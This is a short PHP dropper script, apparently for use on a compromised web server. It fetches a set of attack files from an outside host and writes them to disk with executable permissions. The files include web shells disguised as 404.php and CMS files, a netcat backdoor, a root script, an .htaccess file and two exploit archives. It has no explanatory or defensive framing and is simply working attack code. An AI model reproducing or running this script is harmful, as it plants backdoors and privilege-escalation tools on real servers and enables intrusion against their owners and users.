@set_time_limit(0);
@error_reporting(E_ALL | E_NOTICE);
$x=array(
"404.php.txt"=>"404.php",
"domains.php.txt"=>"domains.php",
"htaccess.txt"=>".htaccess",
"joomla.php.txt"=>"joomla.php",
"netcat.php.txt"=>"netcat.php",
"root.pl"=>"root.pl",
"wordpress.php.txt"=>"wordpress.php",
"exploits1.zip"=>"exploits1.zip",
"exploits2.zip"=>"exploits2.zip",
);
foreach($x as $d=>$z){
$file = fopen($z ,"w+");
$sa=file_get_contents('http://www.webpymes.cl/root/'.$d);
$write = fwrite ($file ,$sa);
fclose($file);
if($write){ echo "[+] Writed : $z "; }else{ echo "[~] Can't Write : $z
"; }
chmod($z , 0755);
}
?>
GOOD WORK | BYE.